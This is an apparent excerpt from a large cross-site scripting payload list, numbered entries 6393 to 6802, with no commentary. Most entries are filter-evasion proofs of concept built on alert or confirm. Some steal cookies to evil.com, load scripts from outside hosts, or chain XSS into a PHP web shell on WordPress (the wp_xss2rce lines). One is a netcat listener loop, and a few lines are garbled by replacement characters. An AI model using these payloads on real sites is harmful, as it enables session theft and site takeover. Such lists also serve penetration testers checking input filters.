  6393. <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt(1)%09><td>AAAAAAAAA
  6394. <TAG EVENT=alert(1)>
  6395. <tag handler=code>
  6396. {tag}<img name=”{/tag} <img src=xx:x onerror=alert({{i}})//”>
  6397. <TAG RESOURCE=javascript:alert(1)>
  6398. tags =querySelectorAll(“.class1”);
  6399. tags =querySelectorAll(“[data-foo]”);
  6400. tags =querySelectorAll(“[data-foo^=bar]”);
  6401. tags =querySelectorAll(“myTag”);
  6402. tags = querySelectorAll(“#someId”);
  6403. </tag><svg onload=alert(1)>
  6404. “></tag><svg onload=alert(1)>
  6405. ?TargetAS=javascript:alert(1)”,
  6406. target=x><input type=hidden name=comment>click me!</form>
  6407. ?t=confirm(1)&k7=”><svg/t=’&k8=’onload=’/&k9=/+eval(t)’
  6408. <TD BACKGROUND=”javascript:alert(‘XSS’)”>
  6409. <td width=”628" background=”/img/index2_r7_c2_r1_c5_s1_s1.jpg”>
  6410. ‘te’ ? alert(‘ifelsesh’) : ‘xt’;
  6411. ‘te’ ^ alert(‘^’) ^ ‘xt’;
  6412. ‘te’ < alert(‘<’) < ‘xt’;
  6413. ‘te’ == alert(‘==’) == ‘xt’;
  6414. ‘te’ > alert(‘>’) > ‘xt’;
  6415. ‘te’ | alert(‘|’) | ‘xt’;
  6416. ‘te’ — alert(‘-’) — ‘xt’;
  6417. ‘te’ , alert(‘,’) , ‘xt’;
  6418. ‘te’ ; alert(‘;’) ; ‘xt’;
  6419. ‘te’ ? alert(‘?:’) : ‘xt’;
  6420. ‘te’ / alert(‘/’) / ‘xt’;
  6421. ‘te’ * alert(‘*’) * ‘xt’;
  6422. ‘te’ & alert(‘&’) & ‘xt’;
  6423. ‘te’ % alert(‘%’) % ‘xt’;
  6424. ‘te’ + alert(‘+’) + ‘xt’;
  6425. ‘te’ in alert(‘in’) in ‘xt’;
  6426. ‘te’ instanceof alert(‘instanceof’) instanceof ‘xt’;
  6427. template is=dom-bind div
  6428. ><test onclick=alert(/Xss-By-Muhaddi/)>Click Me</test>
  6429. ><test onclick=alert(/Xss/)>Click Me</test>
  6430. ��><test onclick=alert(/Xss/)>Click Me</test>
  6431. test=scriptx=document.createElement(%27script%27);x.innerHTML=%27confirm(location)%27;document.body.appendChild(x);/script&notbot=UzXGjMCo8AoAAFUcKTEAAAAN
  6432. ‘text’ ( alert(‘()’) );
  6433. ‘text’ [ alert(‘[]’) ];
  6434. text;alert(1)//
  6435. <textarea autofocus onfocus=alert(1)>
  6436. <textarea autofocus onfocus=alert(1)>//INJECTX
  6437. <textarea autofocus onfocus=confirm(3)>
  6438. “><textarea autofocus onfocus=co\u006efir\u006d(1)>
  6439. “><textarea autofocus onfocus=prompt(1)>
  6440. <!</textarea <body onload=’alert(1)’>
  6441. </textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
  6442. <textarea id=ta onfocus=%22write(‘<script>alert(1)</script>’)%22 autofocus></textarea>
  6443. <textarea id=ta onfocus=%22write(‘<script>confirm(1)</script>’)%22 autofocus></textarea>
  6444. <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open(‘GET’%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)’%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
  6445. <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open(‘GET’%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520confirm(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)’%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
  6446. <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
  6447. <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
  6448. “/><textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
  6449. <textarea id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
  6450. <textarea>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
  6451. <textarea name=’file”; filename=”test.<img src=a onerror=document&amp;#46;location&amp;#61;&amp;#34;http:&amp;#47;&amp;#47;evil&amp;#46;site&amp;#34;>’>
  6452. <textarea name=p id=p>”
  6453. <textarea name=p id=p>
  6454. “<textarea onmousemove=’confirm(1);’>”
  6455. </textarea>’”><script>alert(document.cookie)</script>
  6456. </textarea>’”><script>alert(document.cookie)</script>
  6457. </textarea><script>alert(/xss/)</script>
  6458. </textarea>’”><script>alert(XSS)</script>
  6459. </textarea><ScRiPt>prompt(/man shum/)</ScRiPt//
  6460. ‘//” →</textarea></style></script></title><b onclick= alert()//>*/alert()/*
  6461. <textarea></textarea>test<! — </textarea><img src=xx: onerror=confirm(1)> →
  6462. textContent, nextSibling.nodeValue, firstChild.nodeValue, lastChild.nodeValue, innerHTML
  6463. this+1;
  6464. this[[]+(‘eva’)+(/x/,new Array)+’l’](/xxx.xxx.xxx.xxx.xx/+name,new Array)
  6465. this[Object[“keys”](this)[146]](1)
  6466. this[Object[“keys”](this)[5]](1)
  6467. this[“ownerDocu”+”ment”][“loca”+”tion”]=��//google.com��
  6468. three=”{{set(‘me’,nextSibling.previousSibling)}}”
  6469. throw delete~typeof~confirm(1)/
  6470. \));throw_error()}catch(e){alert(document.domain))}//
  6471. <TimeDisplayFont>Arial</TimeDisplayFont>
  6472. <TimeDisplayFontColor>000000</TimeDisplayFontColor>
  6473. <TimeDisplayFormat>MM:SS</TimeDisplayFormat>
  6474. </title””>
  6475. <””/title>
  6476. <title>*/;alert(2);function%20text(){};function%20html(){}
  6477. </title><frameset><frame src=”data:text/html, fill the whole page and overlap everything<script>confirm(1)</script>”>
  6478. </title><frameset><frame src=”data:text/html,<script>confirm(1)</script>”>
  6479. </title id=””>
  6480. <title><img src=”</title><img src=x onerror=alert(1)//”> // by evilcos
  6481. <title>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</title>
  6482. <title onpropertychange=alert(1)></title><title title=>
  6483. <title onpropertychange=alert(1)></title><title title=></title>
  6484. <title onpropertychange=javascript:alert(1)></title><title title=>
  6485. <title onPropertyChange title onPropertyChange=”javascript:javascript:alert(1)”></title onPropertyChange>
  6486. ‘“></title><script>alert(1111)</script>
  6487. ‘“></title><script>alert(1111)</script>
  6488. ‘“></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
  6489. </title></script>”-alert(187)-”><svg onload=’;alert(1870);’>
  6490. </title><script>alert(1)</script>
  6491. </title></script>”-alert(46)-”><svg onload=’;alert(460);’>
  6492. </TITLE><SCRIPT>alert(“XSS”)
  6493. ‘“></title><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
  6494. “>></title><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
  6495. </title><script>alert(/xss/)</script>
  6496. <;/TITLE>;<;SCRIPT>;alert(“XSS”);<;/SCRIPT>;
  6497. </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
  6498. </title><SCRIPT>document.vulnerable=true;</script>
  6499. </title>”/</script></style></textarea/ →*/<alert()/*’ onclick=alert()//>/
  6500. /</title/’/</style/</script/ →<p” onclick=alert()//>*/alert()/*
  6501. /</title/’/</style/</script/</textarea/ →<p” onclick=alert()//>*/alert()/*
  6502. </title></style></textarea> →</script><a”//’ onclick=alert()//>*/alert()/*
  6503. </title></textarea></style></script →<li ‘//” ‘*/alert()/*’, onclick=alert()//
  6504. toJSON=alert;JSON.stringify(window);
  6505. top[630038579..toString(30)](1)
  6506. top[8680439..toString(30)](1)
  6507. top[8680439..toString(30)](7);
  6508. top[8680439..toString(30)](90)
  6509. top[‘al\145rt’](1)
  6510. top[‘al\145rt’](88)
  6511. top[“al”+”ert”](1)
  6512. top[“al”+”ert”](5);
  6513. top[“al”+”ert”](85)
  6514. top[/al/.source+/ert/.source](1)
  6515. top[/al/.source+/ert/.source](8);
  6516. top[/al/.source+/ert/.source](86)
  6517. top[‘al\x65rt’](1)
  6518. top[‘al\x65rt’](89)
  6519. top[‘al\x65rt’](9);
  6520. top[atob(‘cHJvbXB0’)]()
  6521. top[‘con’.concat(‘firm’)](1)
  6522. top.require(‘child_process’).execSync(‘open -a Calculator’)
  6523. top[unescape(‘%61%6c%65%72%74’)]()
  6524. “”+{toString:alert}
  6525. {…{toString:()=>alert()}}
  6526. toString=alert; this+’1';
  6527. {{{}.toString.constructor(‘confirm(1)’)()}}
  6528. {{ (toString()).constructor.prototype.charAt=(toString()).constructor.prototype.concat;
  6529. {{ (toString()).constructor.prototype.charAt=(toString()).constructor.prototype.concat; $eval((toString()).constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)) }}
  6530. {{toString.constructor.prototype.toString=toString.constructor.prototype.call%3b[%22a%22,%22alert(1)%22].sort(toString.constructor)}}
  6531. {{toString.constructor.prototype.toString=toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor);}}
  6532. {{toString.constructor.prototype.toString=toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor)}}
  6533. {{{}[{toString:[].join,length:1,0:’__proto__’}].assign=[].join; ‘a’.constructor.prototype.charAt=[].join; $eval(‘x=alert(1)//’); }}
  6534. {{ {}[{toString:[].join,length:1,0:’__proto__’}].assign=[].join; ‘a’.constructor.prototype.charAt=’’.valueOf; $eval(‘x=alert(1)//’); }}
  6535. toUpperCase XSS document.write(‘<? oncl?ck=&#97&#108&#101&#114&#116&#40&#49&#41>asd</?>
  6536. try{?????????????????????????????=0;?????????????????????????????()}catch(e){alert(e)}
  6537. try{‘a’ (alert(1)) in ‘a’}catch(e){ ‘a’ (alert(2)) instanceof ‘a’}
  6538. try{confirm(document.domain)}catch(e){location.reload()}
  6539. (()=>{try{return alert(1),eval(‘throw 1’);}catch(e){return alert(2)}finally{return alert(3)}})()
  6540. try{!/\s/.test(‘\u0085’)&&eval(‘\u0085alert(“IE”)’)}catch(e){alert(‘Not IE’)}
  6541. <t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;”>
  6542. <t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(“XSS”)</SCRIPT>”>
  6543. two={{set(‘_nodes.0.scriptprop.src’,’data:\,’)}}
  6544. typeof delete typeof delete void void new new alert`1`
  6545. %u0022%u003e
  6546. %u0022%u003e%u003cscript%u003ealert(1);%u003c/script%u003e
  6547. %u0022%u003e%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
  6548. %u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
  6549. %u0022%u003e%u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
  6550. %u0022%u003e%u003cscript%u003ealert(XSS);%u003c/script%u003e
  6551. %u0025%u0075%u0066%u0066%u0031%u0063%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065%u0061%u006c%u0065%u0072%u0074%u0028%u0018%u0058%u0053%u0053%u0019%u0029%u003b%u0025%u0075%u0066%u0066%u0031%u0063%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065
  6552. \u0027-confirm`1`-\u0027
  6553. \u003c
  6554. \u003C
  6555. \u003cimg src=1 onerror=alert(/xss/)\u003e
  6556. u003cimg src=1 onerror=alert(/xss/)u003e
  6557. \u003Cimg\u0020src=1\u0020onerror=alert(1)\u003e
  6558. %u003cscript%u003ealert(1);%u003c/script%u003e
  6559. %u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
  6560. %u003cscript%u003ealert%u00281uff09%u003b%u003c%uff0fscript%u003e
  6561. %u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
  6562. %u003cscript%u003ealert(XSS);%u003c/script%u003e
  6563. \u003cscript\u003econfirm(\u0027XSS\u0027)\u003c/script\u003e
  6564. \u003csvg/onload=alert`1`\u003e
  6565. %u003csvg onload=alert(55)>
  6566. \u003e
  6567. \u003E
  6568. \u0061lert(1)
  6569. \u0061\u006c\u0065\u0072\u0074
  6570. \u0061\u006c\u0065\u0072\u0074(1)
  6571. \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
  6572. [U+2028]confirm(1)
  6573. [U+2028]prompt(1)[U+2028] →
  6574. U+2200 = [0x00][0x00][0x22][0x00]
  6575. %u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
  6576. %u3008svg onload=alert(56)>
  6577. > U+3C00 = [0x00][0x00][0x3C][0x00]
  6578. < U+3E00 = [0x00][0x00][0x3E][0x00]
  6579. \u{61}l\u{65}rt`1`
  6580. \u{61}|\u{65}rt`1`
  6581. u;alert(1)//
  6582. %uff02%uff1e
  6583. %uff02%uff1e%uff1cscript%uff1ealert(1);%uff1c/script%uff1e
  6584. %uff02%uff1e%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
  6585. %uff02%uff1e%uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
  6586. %uff02%uff1e%uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
  6587. %uff02%uff1e%uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
  6588. %uff1cimg%20src=x%20onerror=prompt(1)%uff1e
  6589. %uff1cscript%uff1ealert(1234)%uff1c/script%uff1e
  6590. %uff1cscript%uff1ealert(1);%uff1c/script%uff1e
  6591. %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
  6592. %uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
  6593. %uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
  6594. %uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
  6595. ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’”>>”
  6596. ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’
  6597. %uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
  6598. %uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e
  6599. %uff1csvg onload=alert(57)>
  6600. \uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
  6601. %uff1c%uff53%uff43%uff52%uff49%uff50%uff54%uff1e%uff41%uff4c%uff45%uff52%uff54%uff08%uff07%uff58%uff53%uff53%uff07%uff09%uff1c%uff0f%uff53%uff43%uff52%uff49%uff50%uff54%uff1e
  6602. %ufflcxss%2f%uffle
  6603. <ul><li><svg onload=”confirm(1)”></li></ul>
  6604. u/><marquee onfinish=confirm(123)>a</marquee>
  6605. [unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)]
  6606. [unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)][atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)
  6607. (unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
  6608. unescape(escape(“????????”).replace(/u../g,’’))
  6609. ;(unescape=eval);
  6610. ;(unescape=eval); // redeclare functions
  6611. ?URI=javascript:alert(1)”,
  6612. */(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())’%3E%3C%%20style=’x:expression/*
  6613. url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E”>
  6614. ?url=javascript:alert(1)”,
  6615. <url>javascript:alert(document.domain)</url>
  6616. [url=javascript:alert(‘XSS’);]click me[/url]
  6617. ‘/(\/\*.*\*\/)/Us’,
  6618. uscriptualert(EXSSE)u/scriptu
  6619. ?userDefined=’);function someFunction(a){}alert(1)//”,
  6620. utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
  6621. UTF-7: +ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
  6622. utf-8&v=XSS
  6623. +/v8-+ADw-script+AD4-alert(28)+ADw-/script+AD4-
  6624. <! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG id=XSS SRC=”javas<![CDATA[cript:alert(‘XSS’);”>
  6625. <! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=”javas<![CDATA[cript:alert(‘XSS’);”>
  6626. <! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=”javas<![CDATA[cript:confirm(document.location);”>
  6627. “”+{valueOf:alert}
  6628. valueOf=alert;
  6629. -{valueOf(){alert`:D`}}
  6630. valueOf=alert;this+1;
  6631. -{valueOf:location,toString:[].pop,0:javascript:alert%281%29.source,length:1}
  6632. values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
  6633. var a=0; ((a == 1) ? 2 : confirm(1));//
  6634. var a = ��foo��/alert(9)//��;
  6635. var a = ��foo��&&alert(9)//��;
  6636. var a = ��foo��+alert(9)//��;
  6637. var a= <%=str_a%>
  6638. “){};var b=’al’+’ert()’;eval(b);if(shit=”
  6639. var buttons =$(“[data-role=button]”);
  6640. var data = “jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”;document.documentElement.innerHTML = data;
  6641. var data = “jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”;document.head.outerHTML = data;
  6642. var data = “jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”;document.write(data);document.close();
  6643. variable[<script>]=*alert(1)</script>
  6644. var m=’alert(0)’;var o=’’;for(var i=0;i<m.length;i++) {o+=’\\’+(m[i].charCodeAt().toString(8));}[][‘\143\157\156\163\164\162\165\143\164\157\162’][‘\143\157\156\163\164\162\165\143\164\157\162’](‘\141\154\145\162\164\50\60\51’)();[][‘constructor’][‘constructor’]
  6645. var n = {a: “-alert(1)}//\”, b: “-alert(1)}//\”};
  6646. var n = {a: “\”, b: “-alert(1)}//”};
  6647. var n = {a: “$p”, b: “$p”};
  6648. var n = {a: “$p”, b: “$q”};
  6649. <var onmouseover=”prompt(1)”>KCF</var>
  6650. <var onmouseover=”prompt(1)”>On Mouse Over</var>?
  6651. <var onmouseover=”prompt(1)”>On Mouse Over</var>
  6652. <var onmouseover=”prompt(1)”>renwax23</var>
  6653. var q:String=loaderInfo.parameters[“q”].split(“\\”).join(“\\\\”);
  6654. var re = /jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e/;
  6655. var rewrittenBindings =ko.expressionRewriting.preProcessBindings(bindingsString, options),
  6656. var str = ‘jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’;
  6657. var str = “jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”;
  6658. “var x=new XMLHttpRequest();x.open(‘GET’,’//0');x.send();
  6659. var{x:x,x=alert(1)}=1;
  6660. var{x:y,}=1
  6661. vbscript & # 00058; alert (1);
  6662. vbscript&#00058;confirm(1);
  6663. vbscript&#058;alert(1);
  6664. vbscript: alert (1);
  6665. vbscript:alert(1);
  6666. vbscript:alert(1); vbscript&#058;alert(1); vbscr&Tab;ipt:alert(1)”
  6667. vbscript:confirm(1);
  6668. vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  6669. vbscript:Msgbox+1
  6670. vbscript:prompt(1)#{“action”:1}
  6671. vbscr & Tab; ipt: alert (1) “
  6672. vbscr&Tab;ipt:alert(1)”
  6673. vbscr&Tab;ipt:confirm(1)”
  6674. v=d.createElement(‘video’);
  6675. v=d.createElement(video);
  6676. veris →group<svg/onload=alert(/XSS/)//
  6677. <videogt;<source onerror=javascript:prompt(911)gt;
  6678. <video id=XSS poster=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))//
  6679. video-js.swf?readyFunction=alert(1)
  6680. video-js.swf?readyFunction=alert%28document.domain%2b’%20XSSed!’%29
  6681. <video onclick=popup=1;>
  6682. <video onerror=alert(1337) </poster>
  6683. <VideO/**/OnerroR=~alert(“1”)+/SrC>
  6684. <video onerror=”javascript:alert(1)”><source>//INJECTX
  6685. <video onerror=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”><source>
  6686. <video onerror=”javascript:javascript:alert(1)”><source>
  6687. <video+onerror=’javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);’><source>%23
  6688. <video+onerror=’javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};document.getElementById(%22safe123%22).click(test);’><source>%23
  6689. <video onloadstart=alert(102)><source>
  6690. <video onloadstart=alert(1)><source>
  6691. <VidEo/oNLoaDStaRt=confirm(1)+/src>
  6692. <video poster=javascript:alert(1)//></video>
  6693. <video poster=javascript:javascript:alert(1)//
  6694. <video/poster/onerror=alert()>
  6695. <video/poster/onerror=alert(1)>
  6696. <video/poster/onerror=prompt(1)>
  6697. <video><source onerror=”alert(1)”>
  6698. <video><source onerror=”javascript:alert(1)”>
  6699. <video><source onerror=”javascript:alert(1)”>//INJECTX
  6700. <Video> <source onerror = “javascript: alert (XSS)”>
  6701. <video><source onerror=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”>
  6702. <video><source onerror=”javascript:javascript:alert(1)”>
  6703. <video><source o?UTF-8?Q?n?error=”confirm(1)”>
  6704. <video src=1 href=1 onerror=”javascript:alert(1)”></video>
  6705. <video src=1 onerror=alert(1)>
  6706. <video src=”http://www.w3schools.com/html5/movie.ogg" onloadedmetadata=”alert(1)” />
  6707. <video src=”http://www.w3schools.com/html5/movie.ogg" onloadstart=”alert(1)” />
  6708. <video/src/id=”onerror”onloadstart=top[id]=confirm;throw”32">
  6709. <video src=. onerror=prompt(0)>
  6710. “<video src=. onerror=prompt(0)>”
  6711. <video src=_ onloadstart=”alert(1)”>
  6712. <video src onratechange=”alert(1)”>
  6713. <video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(1))>
  6714. <video src=x onerror=alert(48)>
  6715. <video src=x onerror=prompt(1);>
  6716. <video src=x onerror=prompt(1);>
  6717. <video src=”x” onloadstart=”alert(1)”>
  6718. <video src=”x” onloadstart=”confirm(1)”>
  6719. <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
  6720. vml.xml:<xml><rect style=”height:100%;width:100%” id=”xss” onmouseover=”alert(1)” strokecolor=”white” strokeweight=”2000px” filled=”false”/></xml>
  6721. v.src=URL.createObjectURL(s);v.play()},function(){});
  6722. vulnerable”%3B%20alert(%27Mondays%27)%3B%20"
  6723. ([,?,,,,?]=””+{},[??,??,??,??,,???,???,???,,,???]=[!!?]+!?+?.?)[?+=?+???+???+??+??+??+?+??+?+??][?](???+???+??+??+??+”(-~?)”)() // (V_V)
  6724. <w contenteditable id=x onfocus=alert()>
  6725. Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
  6726. $ while :; do printf “j$ “; read c; echo $c | nc -lp PORT >/dev/null; done
  6727. width: expression((window.r==document.cookie)?’’:alert(r=document.cookie))
  6728. (window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] +
  6729. window[“ale” + (!![]+[])[+!+[]]+(!![]+[])[+[]]](1)
  6730. window.alert(1)
  6731. window[“alert”](1)
  6732. (window[��alert��])(9)
  6733. window[��alert��](9)
  6734. window.alert(“Bonjour !”);
  6735. window.alert(“Bonjour !”);
  6736. window[/alert/.source](9)
  6737. window.location.assign(“http://xss.cx")
  6738. window.location.replace(“http://stackoverflow.com");
  6739. window.name
  6740. window.name=’a\x01b’
  6741. window.name=’hacked’;location.replace(‘about:blank’);
  6742. window.name=”javascript:confirm((window.opener||window).document.cookie);”;
  6743. window.open(‘http://target.com/?search=<svg/onload=window[localStorage.xss]=window.name//','javascript:alert(1)');
  6744. window.open(“http://xss.cx","confirm(document.domain);", “”, false);
  6745. window[Symbol.hasInstance]=eval
  6746. win.location.href = “https://www.whatismyreferer.com";
  6747. win = window.open(“https://www.paypal.com");
  6748. with(document)alert(cookie)
  6749. #with(document)body.appendChild(createElement
  6750. with(document)body.appendChild(createElement(‘iframe onload=&#97&#108&#101&#114&#116(1)>’),body.innerHTML+=”(IE)
  6751. #with(document)body.appendChild(createElement(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
  6752. with(document)body.appendChild(createElement(‘script’)).src=’//DOMAIN’
  6753. with(document)getElementsByTagName(‘head’)[0].appendChild(createElement(‘script’)).src=’//?.ws’
  6754. with(document.__parent__)alert(1)
  6755. with(location)with(hash)eval(substring(1))
  6756. with(top)body.appendChild (createElement(‘script’)).src=’//0'
  6757. \”};with(window){onload=function(){ with(document){k=cookie;};with(window){location=’http://evil.com/?a=test'%2bk;};}}//;
  6758. with(x)for(i=d=c.width=200;j=i — /d;fillStyle=R(d+i,d/j,arc(99+(i-79)*S(T(t)),S(3*j+S(t*7)/4)*75,j>.9?5:30*S(3*j+.3),0,7),fill()))beginPath()
  6759. $=’_wpnonce=’+/ce” value=”([^”]*?)”/.exec(x.responseText)[1]+’&newcontent=<?=`$_GET[brute]`;&action=update&’+f
  6760. // wp_xss2rce.js 1/3
  6761. // wp_xss2rce.js 2/3
  6762. www.site.com/test.php?var=text;alert(1)//
  6763. www.site.com/test.php?var=textv;alert(1)//
  6764. <w=”/x=”y>”/ondblclick=`<`[confir\u006d``]>z
  6765. wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
  6766. x=”<%”;
  6767. <x>%00%00%00%00%00%00%00<script>alert(1)</script>
  6768. &#x000003c;
  6769. &#x000003c
  6770. &#x000003C;
  6771. &#x000003C
  6772. &#X000003c;
  6773. &#X000003c
  6774. &#X000003C;
  6775. &#X000003C
  6776. &#x000003e;
  6777. &#x000003e
  6778. &#x000003E;
  6779. &#x000003E
  6780. &#X000003e;
  6781. &#X000003e
  6782. &#X000003E;
  6783. &#X000003E
  6784. &#x00003c;
  6785. &#x00003c
  6786. &#x00003C;
  6787. &#x00003C
  6788. &#X00003c;
  6789. &#X00003c
  6790. &#X00003C;
  6791. &#X00003C
  6792. &#x00003e;
  6793. &#x00003e
  6794. &#x00003E;
  6795. &#x00003E
  6796. &#X00003e;
  6797. &#X00003e
  6798. &#X00003E;
  6799. &#X00003E
  6800. &#x0003c;
  6801. &#x0003c
  6802. &#x0003C;
